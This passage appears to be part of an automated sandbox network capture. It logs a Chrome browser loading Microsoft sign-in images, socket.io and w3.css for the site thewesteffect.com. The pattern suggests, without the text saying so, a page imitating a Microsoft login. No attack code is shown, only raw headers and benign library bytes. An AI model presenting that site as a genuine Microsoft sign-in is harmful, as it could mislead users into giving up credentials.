                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC784INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 673
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                                                            x-ms-request-id: 52d94fbf-801e-0017-31fb-346a5d000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120145Z-r178fb8d765hbcjvhC1DFW50zc00000002dg00000000cdgk
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                                                                                                                                            Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                            x-ms-request-id: 5906632b-401e-005b-378d-369c0c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120247Z-r178fb8d765z89v7hC1DFW0kvw00000002d00000000047ad
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_MISS
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.44975713.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC653OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: logincdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 276
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                                                                                                                                                                                            ETag: 0x8D79ED35591CF44
                                                                                                                                                                                                                                            x-ms-request-id: c42efe4b-e01e-005c-0b77-36960e000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120145Z-1749fc9bdbdmg6wshC1DFWu2bc00000002hg000000006wgx
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 79218156
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                                                                                                                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.44975213.35.58.91443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.socket.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 49993
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                            Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                                                                                                                                                            Date: Thu, 05 Sep 2024 12:10:03 GMT
                                                                                                                                                                                                                                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                                                                                                                                                                                            Server: Vercel
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                            X-Vercel-Cache: HIT
                                                                                                                                                                                                                                            X-Vercel-Id: fra1::qxsjc-1725538203767-a565e46decc2
                                                                                                                                                                                                                                            X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                            Via: 1.1 a097fc75e5eca387ecd3618341d82f1a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                            X-Amz-Cf-Pop: FRA60-P10
                                                                                                                                                                                                                                            X-Amz-Cf-Id: nLJKOYwDDzlIMqS-qXhxaQCq6g0dKj0dNYg4GnmsOmNT1qURDNgQOw==
                                                                                                                                                                                                                                            Age: 6859757
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                                                                                                                                                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                                                                                                                                                                                                            Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                                                                                                                                                                                                            Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                                                                                                                                                                                                                            Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.449751192.229.133.221443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC546OUTGET /w3css/4/w3.css HTTP/1.1
                                                                                                                                                                                                                                            Host: www.w3schools.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC581INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Age: 255847
                                                                                                                                                                                                                                            Cache-Control: public,max-age=31536000,public
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Etag: "0cabbc93534db1:0+gzip+ident"
                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Nov 2024 12:32:36 GMT
                                                                                                                                                                                                                                            Server: ECS (lhd/35B3)
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                                            X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                                                            Content-Length: 23427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                                                                                                                                                                                                            Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                                                                                                                                                                                                            Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.449758152.199.21.175443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC661OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Age: 20240877
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Etag: 0x8DB5C3F4AC59B47
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                                                                                                                                                            Server: ECAcc (lhc/78BB)
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            Content-Length: 1636
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                                                                                                                                                                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
